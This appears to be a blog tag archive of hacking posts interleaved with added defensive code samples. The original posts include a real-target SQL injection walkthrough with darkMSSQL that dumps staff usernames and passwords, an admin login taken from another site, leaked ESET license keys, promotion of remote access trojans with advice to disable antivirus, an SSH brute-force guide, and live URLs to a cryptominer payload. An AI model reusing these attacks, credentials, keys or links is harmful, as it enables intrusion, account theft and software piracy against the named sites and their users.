Tag Archives: hack

Shell hiding in image files

One day, we noticed a strange GET request towards our JBoss server:

From the request above, you’ll quickly notice that this attack leverages the Apache Struts vulnerability CVE-2017-5638.
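As an added detection example (not part of the original post, and not the request captured here), the following Python checks whether the Content-Type header of a request carries the OGNL expression markers that CVE-2017-5638 payloads rely on, after URL-decoding the value so an encoded brace is not missed. The marker patterns, the sample requests, the host name and the address 203.0.113.10 are all constructed for illustration:

```python
import re
from urllib.parse import unquote

# Markers typical of CVE-2017-5638 OGNL payloads in the Content-Type header.
# These patterns are an assumption made for this example, not a vendor rule set.
OGNL_MARKERS = {
    "ognl-expression": re.compile(r"%\{"),
    "member-access-bypass": re.compile(r"#_memberAccess"),
    "command-variable": re.compile(r"#cmd\s*="),
    "process-spawn": re.compile(r"ProcessBuilder|getRuntime\(\)"),
}


def content_type_markers(value):
    """Return the names of OGNL markers found in a Content-Type value.

    The value is URL-decoded first so that an encoded '%25%7B' (the characters
    '%{') does not slip past a literal match.
    """
    decoded = unquote(value)
    return sorted(name for name, rx in OGNL_MARKERS.items() if rx.search(decoded))


def parse_request_headers(raw):
    """Split a raw HTTP request into its request line and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, val = line.partition(":")
        if sep:
            headers[name.strip().lower()] = val.strip()
    return lines[0], headers


def classify_request(raw):
    """Flag a request whose Content-Type carries OGNL; returns a small verdict dict."""
    request_line, headers = parse_request_headers(raw)
    hits = content_type_markers(headers.get("content-type", ""))
    return {"request_line": request_line, "markers": hits, "alert": bool(hits)}


# Constructed samples (not captured traffic). 203.0.113.10 is a documentation address.
BENIGN = (
    "GET /app/index.action HTTP/1.1\r\n"
    "Host: jboss.example.internal\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk\r\n"
    "\r\n"
)

# Truncated OGNL skeleton of the kind seen in the wild: an expression in the
# Content-Type header that assigns a #cmd variable holding a wget one-liner.
MALICIOUS = (
    "GET /app/index.action HTTP/1.1\r\n"
    "Host: jboss.example.internal\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#cmd='wget -q -O - http://203.0.113.10/pics/logo.jpg')}\r\n"
    "\r\n"
)

# The same request with the braces URL-encoded, to show why decoding matters.
ENCODED = MALICIOUS.replace("%{", "%25%7B").replace("}", "%7D")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS), ("encoded", ENCODED)):
        print(label, classify_request(sample))
```

A legitimate multipart upload never contains `%{`, so a hit on that marker alone is already a strong signal; the other markers only make the alert more specific.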

The request tried to execute the command below:

“-O” : write the documents to a file.
“-” : if “-” is used as the file, the documents are printed to standard output, disabling link conversion.
“-q” : quiet (no output)

As you see, it tried to fetch an image (a JPEG file) from 91.230.47.41. Seems normal, right?
We fetched the file and took a look at the jpg:

ASCII?? Not JPEG?? hmm..
Here’s what’s inside the “logo.jpg” file:

We noticed there were several other files fetched; possibly a config file and a bin file.
Let’s fetch those files!

Here is the config file:
http://91.230.47.41/pics/kworker.conf

Not sure what it is. Maybe a bin file to run a process:
http://91.230.47.41/pics/kworker

Let’s see if the file is packed:

Yup. So let’s unpack the file using UPX:

http://91.230.47.41/pics/kworker_na

Overall, it looks like the attacker wants to hack our servers and turn them into his own cryptocurrency mining machine.
Typical behavior of the attacks we see at this time, when cryptocurrency is rising. People hack to make a profit. 🙂

Here are the MD5s for the files above:

VNCViewer for Metasploit payload on Mac OS X

When working with VNC payloads, the Metasploit framework needs vncviewer to be installed on the machine. Since Apple includes a VNC client by default with OS X, let’s create a simple bash script that passes the host:port combination Metasploit hands to vncviewer on to the built-in client, so we do not have to fight with XQuartz and X11 to get one running on OS X:

echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
echo open vnc://\$1 >> /usr/local/bin/vncviewer
chmod +x /usr/local/bin/vncviewer

This will allow us to open a connection to a VNC server from the terminal like:

vncviewer 192.168.1.120:5901

How to SSH bruteforce on Linux/Mac OS X

SSH is an acronym for Secure Socket sHell, which provides secure connection access to a remote machine.

By using this SSH brute-force tool, you can test security controls like iptables, sshguard or fail2ban to see whether the rules or policies that have been set are working or not. You are also able to see what a real hacking attempt looks like.

Like most brute-forcing tools, first you’ll need a big password list. You can get one from here:

Get the SSHBrute python script:

To get it to work you will need these packages:

For Mac OS X users, these are the requirements:

  • Xcode 4.3 (App Store link) or later installed including Command Line Tools or install GCC and Command Line Tools without Xcode
  • Get Paramiko 1.7.7.2+ (or whatever the newest version is), this package includes PyCrypto

Download Paramiko here:

Then unzip the Paramiko archive and go to that directory:

Type the following command to start the installation:

After that, unzip SSHBrute:

Go to the SSHBrute directory:

To start the script, run this command:

The parameters:
-h = hostname/IP address
-u = username/username list
-d = password list

This is how the tool works:
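Added example, not part of the original post or of the SSHBrute script: the check a defender runs on the other side of such a test, a fail2ban-style sliding-window count of sshd failures per source address. The log lines, the host name bastion and the IP addresses are constructed; maxretry and findtime borrow fail2ban's option names, but the logic here is this example's own and the year is assumed because syslog lines carry none:

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# OpenSSH "Failed password" lines in syslog format (constructed sample below).
FAILED_RX = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

YEAR = 2024  # assumed: syslog timestamps have no year field


def parse_failed(line):
    """Return (timestamp, source ip, user) for a failed-login line, else None."""
    m = FAILED_RX.match(line)
    if not m:
        return None
    stamp = f"{YEAR} {m['mon']} {int(m['day'])} {m['time']}"
    return datetime.strptime(stamp, "%Y %b %d %H:%M:%S"), m["ip"], m["user"]


def ban_candidates(lines, maxretry=5, findtime=600):
    """Ban an IP once it reaches maxretry failures inside a findtime-second window.

    Returns {ip: timestamp of the failure that crossed the threshold}.
    """
    window = defaultdict(deque)  # per-IP timestamps still inside the window
    banned = {}
    for line in lines:
        parsed = parse_failed(line)
        if parsed is None:
            continue  # accepted logins and unrelated lines do not count
        ts, ip, _user = parsed
        if ip in banned:
            continue
        q = window[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > findtime:
            q.popleft()  # drop failures older than the window
        if len(q) >= maxretry:
            banned[ip] = ts
    return banned


# Constructed auth.log excerpt: one noisy source, one typo by a real user, one slow source.
SAMPLE_LOG = """\
Mar  3 10:00:01 bastion sshd[2201]: Failed password for invalid user admin from 198.51.100.7 port 51234 ssh2
Mar  3 10:00:02 bastion sshd[2202]: Failed password for invalid user oracle from 198.51.100.7 port 51235 ssh2
Mar  3 10:00:04 bastion sshd[2203]: Failed password for root from 198.51.100.7 port 51236 ssh2
Mar  3 10:00:05 bastion sshd[2204]: Failed password for root from 198.51.100.7 port 51237 ssh2
Mar  3 10:00:09 bastion sshd[2205]: Accepted publickey for alice from 192.0.2.5 port 40000 ssh2
Mar  3 10:00:11 bastion sshd[2206]: Failed password for alice from 192.0.2.5 port 40001 ssh2
Mar  3 10:00:12 bastion sshd[2207]: Failed password for root from 198.51.100.7 port 51238 ssh2
Mar  3 10:00:13 bastion sshd[2208]: Failed password for root from 198.51.100.7 port 51239 ssh2
Mar  3 10:30:00 bastion sshd[2300]: Failed password for bob from 203.0.113.9 port 50000 ssh2
Mar  3 10:45:00 bastion sshd[2301]: Failed password for bob from 203.0.113.9 port 50001 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, when in ban_candidates(SAMPLE_LOG).items():
        print(f"ban {ip} (threshold crossed at {when:%H:%M:%S})")
```

With the defaults only 198.51.100.7 is banned, at its fifth failure (10:00:12); alice's single typo and bob's two attempts fifteen minutes apart never reach the threshold. Tightening findtime to 3600 s with maxretry 2 would also catch the slow source, which is the trade-off a brute-force test like the one above lets you measure.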

SQLI – buyamotor[dot]com[dot]my

I left these things behind almost a decade ago..

Target:              http://www.buyamotor.com.my/motor.php?cat=53
Host IP:            42.1.60.81
Current DB:     buyamoto_buym
Databases:       information_schema
                         buyamoto_buym

Data Found:
admin_email | admin_id | admin_user | admin_pwd
[email protected] | 1 | admin | adminpassword

But luckily I didn’t manage to find the admin page.. 🙁

CSRF in SpiceFuse Shoutbox (MyBB)

For anyone who has a MyBB-based forum and uses the SpiceFuse Shoutbox, you had better read this..
because there is something interesting here.. 🙂
Johnburn from tbd.my found this, so I’m sharing it here..
Special thanks to Johnburn for this article & solution.. 🙂

The story:
Earlier, having nothing to do, I was looking through the MyBB code with the aim of bypassing MyBB’s XSS filter through its BBCode. While looking around I noticed something rather interesting in the shoutbox code (I installed the same SpiceFuse Shoutbox plugin as on TBD and my0d). This plugin is vulnerable to CSRF via an image tag.

PoC:
If a user posts the following in the shoutbox, any other user who views the shoutbox will automatically post an arbitrary shout as well, provided their browser is set to load images (the default).

http://www.tbd.my/v2/xmlhttp.php?action=add_shout&shout_data=sebarangPost

Quick Fix:
This can be prevented by using a token in the shoutbox. To add the token, follow the steps below:

Edit this file:

find the following line:

and replace it with this line:

Edit this file:

find this line:

add the following line after the code above:

find the following line:

and replace it with this line:

Edit this file:

find the following line:

add the following code after the line of code above:

p/s: you may need to reactivate the shoutbox so that the changes to the template take effect.
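An added example, not Johnburn’s patch: since the edited lines of the plugin are not reproduced here, this Python simulation shows the same fix in miniature. The field name my_post_key follows the MyBB form convention (an assumption made here), the Session class stands in for the forum’s login session, and shouts is a plain list standing in for the database:

```python
import hmac
import secrets


class Session:
    """Server-side session; the token is minted once per login and never placed in a URL."""

    def __init__(self, user):
        self.user = user
        self.post_key = secrets.token_hex(16)


def add_shout_vulnerable(session, method, params, shouts):
    """Original behaviour: any request carrying shout_data is accepted, whatever its origin.

    An <img src="xmlhttp.php?action=add_shout&shout_data=..."> on any page is enough,
    because the browser attaches the victim's forum cookies to the image request.
    """
    shouts.append((session.user, params["shout_data"]))
    return True


def add_shout_fixed(session, method, params, shouts):
    """Hardened: require POST and a per-session token that a third-party page cannot read."""
    if method != "POST":
        return False  # an <img> tag can only ever issue a GET
    supplied = params.get("my_post_key", "")
    if not hmac.compare_digest(supplied, session.post_key):
        return False  # missing or guessed token; constant-time compare avoids timing leaks
    shouts.append((session.user, params["shout_data"]))
    return True


def simulate():
    """Replay the PoC against both handlers and report what each accepted."""
    victim = Session("victim")
    # The request a viewer's browser fires when it renders the attacker's image tag:
    forged = {"action": "add_shout", "shout_data": "sebarangPost"}
    # A submission from the real shoutbox form, whose template now embeds the key:
    genuine = dict(forged, my_post_key=victim.post_key)
    # A forged submission with a guessed token:
    guessed = dict(forged, my_post_key=secrets.token_hex(16))

    vulnerable, fixed = [], []
    results = {
        "vulnerable_img_get": add_shout_vulnerable(victim, "GET", forged, vulnerable),
        "fixed_img_get": add_shout_fixed(victim, "GET", forged, fixed),
        "fixed_forged_post_no_key": add_shout_fixed(victim, "POST", forged, fixed),
        "fixed_forged_post_guessed_key": add_shout_fixed(victim, "POST", guessed, fixed),
        "fixed_genuine_post": add_shout_fixed(victim, "POST", genuine, fixed),
    }
    return results, len(vulnerable), len(fixed)


if __name__ == "__main__":
    outcome, n_vuln, n_fixed = simulate()
    for case, accepted in outcome.items():
        print(f"{case:32s} accepted={accepted}")
    print(f"shouts stored: vulnerable={n_vuln} fixed={n_fixed}")
```

The token only works because the attacker’s page cannot read it: it lives in the victim’s session and in the forum’s own HTML, which the same-origin policy keeps away from other sites. Requiring POST on top of the token closes the image-tag vector outright.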

Remote Administrator Tools a.k.a. RAT

Some of you may have only just heard of RATs,
and some have known about this tool for a long time (the old-timers)..
So, here I’ll list a few of my favourite tools.. 😀

1. Cybergate
p/s: click on the picture if you want to enlarge it..

Produced by Cyber-Sec, this is the tool I like to use..
Many hackers use this tool..
But its releases are now limited..

Only up to version 1.03.0 Public Version, I think..
From now on, if you want the latest version, you have to buy it.. 🙁

But you can still get the older versions of this tool..

2. Spy-Net
p/s: click on the picture if you want to enlarge it..

This is also one of the great RAT tools..
With its best feature, the USB Spreader, you can spread your ‘rat’ without any hassle.. 😀
USB Spreader means that when a pendrive is plugged into a PC already hit by your ‘rat’, that pendrive is what spreads your ‘rat’ automatically..
No need to go to the trouble of waiting for people to download your ‘rat’.. 🙂
Great, isn’t it?

But this tool’s production has been stopped for unknown reasons..
The last version released was version 2.7..
You can get it here; Spy-Net

There are actually more RAT tools..
Among them:
– Cerberus
– Dark-Comet
– Apocalypse
– Turkojan
– Deeper

I won’t give the links because later you’ll say I’ve planted a ‘rat’ in them.. 😀
So, be smart and google for more information & download links yourselves.. 🙂

p/s : these are categorised as hacking tools. So kindly turn off your AV if you want to use them..

Zeus Trojan found on 74k PCs of users worldwide.


More than 74k PCs in almost 2,500 organisations around the world have been compromised for a year and a half by a botnet infection designed to steal secrets from those databases by getting into banking sites, social networks and e-mail systems.

The systems were infected with the Zeus Trojan, and the botnet was nicknamed “Kneber” after the user whose Trojan-infected PC was linked to company and government systems, according to research by NetWitness.

The Wall Street Journal reported that Merck, Cardinal Health, Paramount Pictures and Juniper Networks were among the targets of the attack. NetWitness speculated that criminals in Eastern Europe, using command-and-control servers in Germany, delivered it through e-mail attachments containing malware or links to malware on web pages that employees of those companies clicked without realising it.

NetWitness said they discovered more than 75 GB of valuable stolen data while carrying out their routine tasks as part of a client network evaluation on 26 January. The cache of stolen data included 68k corporate login identities, access to e-mail systems, online banking sites, Facebook, Yahoo, Hotmail, 2k SSL (Secure Socket Layer) files and data on the infected individuals.

Besides stealing specific data, Zeus can be used to find and steal any file on the computer, download and run programs, and let someone control the computer remotely.

More than half of the compromised machines were also infected with a peer-to-peer (p2p) malware bot known as Waledac, the company said. Almost 200 countries were hit by this infection, with most infections found in Egypt, Mexico, Saudi Arabia, Turkey and the United States.

The news came after Google announced it had been targeted in an attack, believed to have hit more than 30 other companies as well, that was traced back to China. McAfee named this attack “Operation Aurora”.

“While Operation Aurora illustrated an advanced threat, the number of companies and organisations compromised is even greater with this single botnet,” said Amit Yoran, Chief Executive of NetWitness and Director of the National Cyber Security Division. “This is a large-scale compromise of corporate networks that has reached a dangerous level of infestation.”

ESET Nod32 Taiwan pwn! :)

Today, another Nod32 website has been pwned/hacked..

Here is the screenshot:

ESET NOD32 Taiwan

So, on this peaceful day, I have something to give to you all.. 🙂

new_key=J112-mgf7f4r8u   org_key=J102-e4rdefyr5
new_key=J112-r6w87jwy2   org_key=J102-e5xzgsrfw
new_key=J112-spgbw2j5w   org_key=J102-e7tj8p3ww
new_key=J112-p94sfm3yt   org_key=J102-e83dteggq
new_key=J112-tm6v4yttt   org_key=J102-e9wwn8h4f
new_key=J112-uwwqk7vjy   org_key=J102-eax58prwg
new_key=J112-syw3wr7wp   org_key=J102-eb5c58mkj
new_key=J112-e4u6emunx   org_key=J102-ebcekvqed
new_key=J112-tsaudq3cy   org_key=J102-ecnf7u3ue
new_key=J112-ycbmr376x   org_key=J102-ecnhq856w

Brand new NOD32 keys.. ahaha..

This thing really annoys me..

Why?

Because their website security is really low..

They don’t manage their db very well..

I’m just wondering why they put important things like serial keys, passwords, usernames and other important files in their database without encrypting them..

Like some of the dbs that I found, mostly they don’t encrypt their passwords..

Sounds bad to me.. 🙂

Anyway, see you next time!

Assalamualaikum.. 🙂

Heraldonline.com & Mahkamah.gov.my pwnd!

1st topic.

This website was hacked on the 4th of January 2010, two days after a High Court decision allowing Catholics to use “Allah” to describe the Christian God in the national language. WTF!?

For more stories about what is happening, just go to Herald Malaysia and read the stories inside.. 🙂

2nd topic.

This is another website that was hacked, on the 7th of January 2010, just 3 days after Herald Malaysia was pwned.

Just my opinion, but I think this action is because of the court’s decision allowing The Herald to use the word ‘Allah’ in its publication.

More news here and here.

Huh! What a long journey for the 1st week of 2010..

The new year has barely begun and all sorts of cases have already happened..

All sorts of things..

p/s : To all readers, I hope you can appreciate the underlying message I am really trying to convey in this article..

darkMSSQL tutorial

Today I want to show you how to use darkMSSQL.py…

This is used for MSSQL databases that show errors..
I rarely come across an MSSQL database with errors..
Even when I do, it’s just luck..

I guess the web admin must be really lazy..
GMi’s server also runs on MSSQL..
Oops! Sorry! :p

Anyway, let’s see how I use this darkMSSQL.py..

The darkMSSQL.py journey… begins…


-h command (help)
Usage: ./darkMSSQL.py [options]                       rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --info    Gets MySQL server configuration only.
Define: --dbs     Shows all databases user has access too.
Define: --schema  Enumerate Information_schema Database.
Define: --dump    Extract information from a Database, Table and Column.
Define: --insert  Insert data into specified db, table and column(s).

Required:
Define: -u        URL "www.site.com/news.asp?id=2" or "www.site.com/index.asp?id=news'"

Mode dump and schema options:
Define: -D        "database_name"
Define: -T        "table_name"
Define: -C        "column_name,column_name..."

Optional:
Define: -p        "127.0.0.1:80 or proxy.txt"
Define: -o        "ouput_file_name.txt"        Default is darkMSSQLlog.txt
Define: -r        "-r 20" this will make the script resume at row 20 during dumping
Define: --cookie  "cookie_file.txt"
Define: --debug   Prints debug info to terminal.

Ex: ./darkMSSQL.py --info -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --dbs -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --schema -u "www.site.com/news.asp?id=2" -D dbname
Ex: ./darkMSSQL.py --dump -u "www.site.com/news.asp?id=2" -D dbname -T tablename -C username,password
Ex: ./darkMSSQL.py -u "www.site.com/news.asp?news=article'" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass

[email protected]:~/Desktop$ python darkMSSQL.py --info -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:25
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying information about MSSQL host!

[+] @@VERSION: Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
May  3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

[+] USER: mylittletail_usr
[+] DB_NAME(): mylittletail_db
[+] HOST_NAME(): SERVER439

[+] Script detected Microsoft SQL Version:  2000
[+] Checking to see if we can view password hashs... Nope!

[-] [00:19:26]
[-] Total URL Requests 5
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dbs -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL: http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:39
[+] Cookie: None
[-] Proxy Not Given
[+] Displaying list of all databases on MSSQL host!

[0] mylittletail_db
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] lotteryuk_db
[8] mylittletail_db
[9] sailor_db

[-] 00:19:41
[-] Total URL Requests 11
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --schema -D mylittletail_db -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:31:03
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying tables inside DB: mylittletail_db

[0] addon
[1] category
[2] country
[3] delivery
[4] discount
[5] dtproperties
[6] featured_category
[7] featured_item
[8] featured_maincategory
[9] item_packages
[10] item_questions
[11] items
[12] items_addon
[13] items_also
[14] main_items
[15] member
[16] message
[17] millkak
[18] newsletter_counter
[19] newsletter_log
[20] newsletter_master
[21] order
[22] order_item
[23] subcategory
[24] sysconstraints
[25] syssegments
[26] t_jiaozhu
[27] temp_order
[28] temp_order_id
[29] ticketing
[30] uploadform
[31] userlog
[32] users

[-] [00:31:09]
[-] Total URL Requests 34
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dump -D mylittletail_db -T users -C username,password -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:27:52
[+] Cookie: None
[+] Proxy Not Given
[0] 20admin08:72hu1ge9 admin
[1] yennee08:01yen04nee admin
[2] jolen18e:dedica18 staff
[3] jason:11jas37on5 admin
[4] katrina03:031983 staff
[5] zack09:20gift09 staff
[6] 3sales69:3moneytail69 staff

[-] [00:27:54]
[-] Total URL Requests 8
[-] Done

Don't forget to check darkMSSQLlog.txt

Do you guys understand this?

If not, you can ask me..

It’s not that hard.. 😀

p/s : thanks to rsauron from darkc0de for this script.. nice one mate! 🙂
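Added example, not part of the tutorial or of rsauron’s script: what makes a page like the one in the walkthrough enumerable is that the item_id parameter is concatenated into the SQL text and the database’s error message is echoed back to the client. This Python uses an in-memory SQLite database with constructed rows (SQLite standing in for MSSQL, so the error wording differs) to show the vulnerable lookup beside a parameterised one that validates the type and returns only a generic error:

```python
import sqlite3


def make_db():
    """In-memory stand-in for the shop database in the walkthrough (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (item_id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO items VALUES (?, ?, ?)",
        [(2003, "sub box", 9.5), (2004, "tail set", 14.0), (2005, "ribbon", 3.25)],
    )
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'stored-as-hash-elsewhere', 'admin')")
    return conn


def lookup_item_vulnerable(conn, item_id):
    """The pattern an error-based tool abuses: the raw parameter is glued into the query."""
    sql = "SELECT name FROM items WHERE item_id = " + item_id
    return [row[0] for row in conn.execute(sql)]


def vulnerable_endpoint(conn, item_id):
    """Mimics an ASP page that prints the driver's error text straight into the response."""
    try:
        return {"rows": lookup_item_vulnerable(conn, item_id), "error": None}
    except sqlite3.Error as exc:
        # The error text reaches the client: this is what "error-based" enumeration reads.
        return {"rows": [], "error": str(exc)}


def lookup_item_safe(conn, item_id):
    """Validate the type, bind the value, and never echo the driver's error to the client."""
    try:
        key = int(item_id)
    except ValueError:
        return {"ok": False, "error": "invalid item id", "rows": []}
    try:
        cur = conn.execute("SELECT name FROM items WHERE item_id = ?", (key,))
        rows = [row[0] for row in cur]
    except sqlite3.Error:
        # Log the real exception server-side; the client only ever sees a generic message.
        return {"ok": False, "error": "lookup failed", "rows": []}
    return {"ok": True, "error": None, "rows": rows}


if __name__ == "__main__":
    db = make_db()
    for probe in ("2003", "2003 OR 1=1", "2003'"):
        print(f"item_id={probe!r}")
        print("  vulnerable:", vulnerable_endpoint(db, probe))
        print("  safe      :", lookup_item_safe(db, probe))
```

The two things the safe version changes are exactly the two things the tool depends on: the parameter can no longer alter the query’s structure, and a malformed value produces a fixed message rather than the database’s own diagnostics, so there is nothing to enumerate from.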